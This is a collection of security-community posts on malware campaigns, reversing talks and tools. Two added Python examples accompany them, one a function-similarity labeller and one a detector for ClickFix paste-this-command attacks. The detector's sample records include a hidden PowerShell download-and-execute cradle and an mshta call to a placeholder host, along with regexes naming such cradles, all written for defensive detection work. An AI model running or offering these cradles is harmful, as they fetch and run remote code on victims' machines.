Great analysis of the malware distributed with the eslint-config-prettier NPM package compromise on Friday: https://c-b.io/2025-07-20+-+Install+Linters%2C+Get+Malware+-+DevSecOps+Speedrun+Edition
Cybercrime group FIN6 (aka Skeleton Spider) is leveraging trusted cloud services like AWS to deliver malware through fake job applications.
Our latest analysis breaks down: How attackers use LinkedIn & Indeed to build trust
The use of resume-themed phishing lures
Cloud-hosted infrastructure that evades detection
The delivery of the More_eggs backdoor via .LNK files
Key defense strategies for recruiters and security teams
This campaign is a masterclass in low-complexity, high-evasion phishing.
Read the full breakdown: https://dti.domaintools.com/skeleton-spider-trusted-cloud-malware-delivery/?utm_source=Mastodon&utm_medium=Social&utm_campaign=Skeleton-Spider
Ever wonder how cybercriminals weaponize PDFs?
Check out Filipi Pires' #BSidesBoulder25 talk, "Structural Insights: PDF Analysis for Detecting and Defending Against Threats"! In his session, he'll explore the structure of PDFs and how malicious payloads can be hidden within them, provide guidance on identifying the Indicators of Attack (IOAs) found within them, and show you how to outsmart common obfuscation routines found in them. Come for the malware, stay for the live demos and defense tips! #CyberSecurity #PDFThreats #MalwareAnalysis #BSides #BSidesBoulder
Check out our full schedule at https://bsidesboulder.org/schedule/
Tickets are available for purchase for our 13 June event here: https://www.eventbrite.com/e/bsides-boulder-2025-registration-1290129274389
Hot off the presses!
DomainTools Investigations shares that a spoofed antivirus download page is delivering VenomRAT, StormKitty, and SilentTrinity—a powerful combo for credential theft, persistence, and long-term access.
We traced the infrastructure, payloads, and attacker tactics.
Full breakdown: https://dti.domaintools.com/venomrat/?utm_source=Mastodon&utm_medium=Social&utm_campaign=VenomRAT
@REverseConf If you ever need to find both the talk video and the slides again, they are collected in one place on my site and on GitHub, for your convenient bookmarking:
https://cxiao.net/posts/2025-02-28-reconstructing-rust-types-re-verse-2025/
https://github.com/cxiao/reconstructing-rust-types-talk-re-verse-2025/
@REverseConf The slides for "Reconstructing Rust Types: A Practical Guide for Reverse Engineers" are also available! There is a convenient single-page HTML version if you want to use the material in the presentation as a reference, for your own reversing!
https://cxiao.net/posts/2025-02-28-reconstructing-rust-types-re-verse-2025/
https://github.com/cxiao/reconstructing-rust-types-talk-re-verse-2025/
Hi Rust reversing fans - the recording of my talk at @REverseConf: Reconstructing Rust Types: A Practical Guide for Reverse Engineers, is available for you to watch!
Next Thursday, May 15 at @NorthSec in Montreal, I will be hosting the workshop "Reconstructing Rust Types: A Practical Guide for Reverse Engineers"! This will be a 3-hour workshop on how to approach Rust types and data structures when reversing Rust binaries. See https://nsec.io/session/2025-reconstructing-rust-types-a-practical-guide-for-reverse-engineers.html for more details!
Workshops at NorthSec will be streamed on YouTube Live. My workshop is scheduled for 1300-1600 EDT (UTC-4) on Thursday, May 15 in the Workshop 2 track, in Salle de la Commune. The stream link for all the Thursday Salle de la Commune workshops is here: https://www.youtube.com/watch?v=UwJgS32Q6As&list=PLuUtcRxSUZUrW9scJZqhbiuTBwZBJ-Qic&index=7
Looking forward to seeing folks there!
(Edited since I can't count days of the week apparently: May 15, which is when my workshop is occurring, is a Thursday, not a Wednesday.)
Experts report that a new social engineering technique is using ClickFix Captcha to deliver malware like Quakbot, effectively bypassing traditional security measures and posing a significant threat. #MalwareAnalysis #CyberSecurity https://darkatlas.io/blog/delivering-trojans-via-clickfix-captcha
With our team at Stratosphere Laboratory AIC FEE CTU, we are organising this year's Honeynet Project Workshop 2025 in Prague!
It will be a unique space to share your passion for deception technologies, honeypots, and cybersecurity with industry leaders and fellow researchers!
We are looking for sponsors who want to support deception research!
Early birds are still open until April 29th! Grab your tickets!
Last days to submit your training and talks proposals!
Students can apply for a Cédric Blancher Memorial Scholarship!
This is the first time the conference is coming to Prague, with previous editions hosted in Copenhagen (2024), Innsbruck (2019), Taipei (2018), Canberra (2017), San Antonio (2016), Stavanger (2015), Warsaw (2014), Dubai (2013), San Francisco (2012), Paris (2011), Mexico City (2010) and Kuala Lumpur (2009).
What a unique opportunity!
https://prague2025.honeynet.org/
Boost and help us spread the word!
In the course of its investigations, @volexity frequently encounters malware samples written in Golang. This reflects the increase in popularity of Golang generally, and presents challenges to reverse engineering tools.
Today, @volexity is releasing GoResolver, open-source tooling to help reverse engineers understand obfuscated samples. @r00tbsd & Killian Raimbaud presented details at INCYBER Forum earlier today.
GoResolver uses control-flow graph similarity to identify library code in obfuscated code, leaving analysts with only malware functions to analyze. This saves time & speeds up investigations!
Check out the blog post on how GoResolver works and where to download it: https://www.volexity.com/blog/2025/04/01/goresolver-using-control-flow-graph-similarity-to-deobfuscate-golang-binaries-automatically/
#dfir #reversing #malwareanalysis
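As an added illustration of the idea in the post above (library-code identification by control-flow-graph similarity), here is a deliberately simplified sketch in Python. It is not GoResolver's code or algorithm and is not from Volexity; it uses a Weisfeiler-Lehman style relabelling of basic blocks and a weighted Jaccard score, and the CFGs, function names and the 0.8 match threshold are all constructed for the demonstration rather than lifted from a real binary.

```python
"""Constructed example: label functions in a stripped/renamed sample by
comparing their control-flow graphs against a reference corpus of known
library functions. Not GoResolver; a toy sketch of the same idea."""
from collections import Counter
import hashlib

# A CFG is {block_id: (terminator_kind, [successor_block_ids])}.
# terminator_kind is one of "call", "cjmp" (conditional jump), "jmp", "ret".
# Block ids are arbitrary on purpose: stripping and renaming change names,
# not branch structure, so the fingerprint must ignore them.


def wl_fingerprint(cfg, rounds=2):
    """Weisfeiler-Lehman style relabelling. Each round a block's label becomes
    a hash of its own label plus the sorted labels of its successors, so after
    k rounds a label summarises the k-hop neighbourhood. The multiset of all
    labels over all rounds is the fingerprint."""
    labels = {b: kind for b, (kind, _) in cfg.items()}
    bag = Counter(labels.values())
    for _ in range(rounds):
        new = {}
        for b, (_, succs) in cfg.items():
            sig = labels[b] + "|" + ",".join(sorted(labels[s] for s in succs))
            new[b] = hashlib.sha1(sig.encode()).hexdigest()[:8]
        labels = new
        bag.update(labels.values())
    return bag


def similarity(fp_a, fp_b):
    """Weighted Jaccard over two fingerprint multisets: 1.0 means identical structure."""
    inter = sum((fp_a & fp_b).values())   # Counter & Counter = element-wise min
    union = sum((fp_a | fp_b).values())   # Counter | Counter = element-wise max
    return inter / union if union else 0.0


def label_functions(sample, reference, threshold=0.8):
    """Return {sample_fn: (best_reference_fn, score)} for functions that match a
    reference above `threshold`, else None. The None entries are the functions
    the analyst actually has to read; the rest are (probably) library code."""
    ref_fps = {name: wl_fingerprint(cfg) for name, cfg in reference.items()}
    result = {}
    for fn, cfg in sample.items():
        fp = wl_fingerprint(cfg)
        name, score = max(((n, similarity(fp, r)) for n, r in ref_fps.items()),
                          key=lambda t: t[1])
        result[fn] = (name, score) if score >= threshold else None
    return result


# Constructed reference corpus (hypothetical library functions).
REFERENCE = {
    "lib_loop_copy": {0: ("cjmp", [1, 2]), 1: ("call", [0]), 2: ("ret", [])},
    "lib_straight":  {0: ("call", [1]), 1: ("call", [2]), 2: ("ret", [])},
}

# Constructed "obfuscated" sample: sub_401000 is lib_loop_copy with renumbered
# blocks; sub_402000 has a shape that appears in neither reference function.
SAMPLE = {
    "sub_401000": {10: ("cjmp", [11, 12]), 11: ("call", [10]), 12: ("ret", [])},
    "sub_402000": {0: ("cjmp", [1, 2]), 1: ("call", [3]), 2: ("call", [3]),
                   3: ("cjmp", [4, 0]), 4: ("ret", [])},
}

if __name__ == "__main__":
    for fn, match in label_functions(SAMPLE, REFERENCE).items():
        print(fn, "->", match or "UNKNOWN (analyse manually)")
```

The WL relabelling is what gives the scheme its robustness to symbol stripping and block reordering; the flip side is that any obfuscator that rewrites branch structure (opaque predicates, control-flow flattening) will push genuine library code below the threshold, which is why a real tool needs a large reference corpus built from the same toolchain versions and a threshold tuned against it.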
Malware Is Evolving — And So Are the Languages It’s Written In — A new study highlights a growing tactic among malware developers: coding in uncommon languages to evade detection.
Key takeaways:
Obscure languages like Lisp, Rust, Haskell, Delphi, and Phix are harder for static analysis tools to parse.
These languages often produce fragmented memory layouts and more indirect execution paths, complicating reverse engineering.
Even the choice of compiler — like Tiny C or Embarcadero Delphi — impacts how easily malware can be flagged.
APTs (Advanced Persistent Threats) are increasingly adopting these strategies to fly under the radar.
Security teams must broaden their detection capabilities and adapt tooling for these underrepresented programming environments.
#CyberSecurity #ThreatIntel #MalwareAnalysis #Infosec #Programming #ReverseEngineering #security #privacy #cloud #infosec
https://www.theregister.com/2025/03/29/malware_obscure_languages/
I'm in a weird position professionally and guess I am looking for a #mentor ? Maybe just someone more experienced than me to talk to and not necessarily some long term commitment of expectations? Growth just isn't going to happen where I'm at and I think I keep getting stuck in an under-/overqualified limbo.
Mainly work in #malwareanalysis #threatintel #detectionengineering with heavy #programming skills.
I always see #CyberMentorMondays; does it do anything?
Amadey tops the charts associated with the most malware sites (3112 samples) over the last 30 days. But which malware family had the most significant increase?
Find out here - URLHaus | Malware sites
https://www.spamhaus.org/malware-digest/#urlhaus
All the data in this report is provided by @abuse_ch, a project committed to fighting abuse on the internet.
A funny phishing attempt targeting GitHub users with an email notification about a security issue on an existing repository.
Then the captcha verification on a malicious website is trying to trick the user to run a shell command on Windows.
PowerShell to be executed by the user
https://gist.github.com/adulau/6cf6f3e9c5bbd9106af8814d0a22f473
File downloaded https://pandora.circl.lu/analysis/21e8f693-361b-4a04-853c-276f9dd841e4/seed-1XqUr4mADaFYlLAyrBH8oQUBgOoEbceZ586b8h05YyA - Lumma Stealer
Malicious domain analysis. https://lookyloo.circl.lu/tree/91106035-dfec-4acc-af06-c9fc36c62774
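The post above and the earlier ClickFix Captcha post describe the same pattern: a fake verification page talks the user into pasting a command into a Windows run box, and the command downloads and runs the payload. As an added example (not from either post, not CIRCL's or Dark Atlas's code), here is a scoring heuristic for that pattern run over hand-constructed process-creation records whose field names mimic Sysmon Event ID 1. The parent/interpreter sets, regexes, lure-comment check and threshold of 3 are all assumptions to tune against your own telemetry; the records are constructed, not real events.

```python
"""Constructed example: flag ClickFix-style "paste this command" executions.
Signals: an interpreter spawned directly from the user's shell (Win+R / pasted
command), hidden-window or policy-bypass flags, a download-and-execute cradle,
a URL on the command line, and lure text in a trailing comment."""
import re

# Assumed: a shell parent means the user typed/pasted the command themselves.
USER_SHELL_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Download-and-execute cradle fragments (assumed list, extend as needed).
CRADLE = re.compile(
    r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|iex|invoke-expression|"
    r"downloadstring|mshta\s+https?://)")
# Flags that hide the window or bypass execution policy / logging.
HIDDEN = re.compile(
    r"(?i)(-w(indowstyle)?\s+h(idden)?|-nop\b|-noprofile|-ep\s+bypass|"
    r"-executionpolicy\s+bypass|-enc(odedcommand)?\b)")
URL = re.compile(r"(?i)https?://\S+")
# Lure pages often append a comment so the pasted line "looks like" a
# verification string to the victim (assumption: tune wording to your cases).
LURE = re.compile(r"(?i)#.*\b(robot|captcha|verification)\b")


def score_event(ev):
    """Return (score, reasons) for one process-creation record."""
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = ev["CommandLine"]
    reasons = []
    if parent in USER_SHELL_PARENTS and image in INTERPRETERS:
        reasons.append("interpreter launched directly from the user's shell")
    if HIDDEN.search(cmd):
        reasons.append("hidden-window / policy-bypass / encoded flags")
    if CRADLE.search(cmd):
        reasons.append("download-and-execute cradle")
    if URL.search(cmd):
        reasons.append("URL on the command line")
    if LURE.search(cmd):
        reasons.append("captcha/verification lure text in a trailing comment")
    return len(reasons), reasons


def find_clickfix(events, threshold=3):
    """Return [(event_id, reasons)] for records scoring at or above threshold."""
    hits = []
    for ev in events:
        n, reasons = score_event(ev)
        if n >= threshold:
            hits.append((ev["Id"], reasons))
    return hits


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [  # constructed records, not real telemetry; example.invalid is a reserved TLD
    {"Id": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -ep bypass -c "iwr https://example.invalid/verify.ps1 | iex" '
                    '# I am not a robot - Verification ID 7731'},
    {"Id": 2, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/captcha"},
    {"Id": 3, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell"},                       # user opened a console
    {"Id": 4, "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": r"powershell -NoProfile -File C:\Scripts\inventory.ps1"},  # scheduled task
]

if __name__ == "__main__":
    for event_id, reasons in find_clickfix(EVENTS):
        print(f"event {event_id}: {'; '.join(reasons)}")
```

The single strongest signal is the parent: a legitimate admin script is started by a scheduler, an RMM agent or a console the user already had open, not by explorer.exe with a one-line download cradle. Because the command is typed into Win+R, the same string also lands in the user's HKCU RunMRU registry key, which is worth collecting as a second, host-based source when process telemetry is missing.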
I accidentally removed this; 1 sec
Hello! I just joined; a friend mentioned this nice social network. Happy to be here! A small intro: I am 24 years old and have always been into reverse engineering, more specifically malware reversing, including rootkits, EQGRP stuff, and such. Nice to meet everyone!
If needed, my github is this:
https://github.com/loneicewolf
(I always include it in intros.)
Wishes and Saluting Sweden!
DMs/PMs open, if needed ^_^
What are your go-to tools for #malwareanalysis ?
Delving into the wonderful world of macOS malware, this time I'm analysing "PureLand", an info stealer targeting crypto wallets on macOS systems. It's the first attempt, and we spend some time understanding the structure of macOS applications. https://polaryse.github.io/posts/pureland_analysis/ #MacOS #macmalware #malware #reverseengineering #malwareanalysis #ARM #infostealer #pureland #eCrime
And here we have Part 2 of the series: Using UTM to emulate x86_64 and the creation of a macOS malware analysis VM.
https://polaryse.github.io/posts/applesiliconenv_utm/
I was recently approached by a friend whose website, which they manage, had been compromised. They offered to let me take a look at some of the files left behind by the attacker. In today's blog post, I go over my methods for deobfuscating a staging script the attacker used.
#hacking #MalwareAnalysis #ReverseEngineering #PHP #CyberSecurity #InfoSec #IndieWeb #SmallWeb
https://www.vzqk50.com/blog/deobfuscating-a-malware-stager/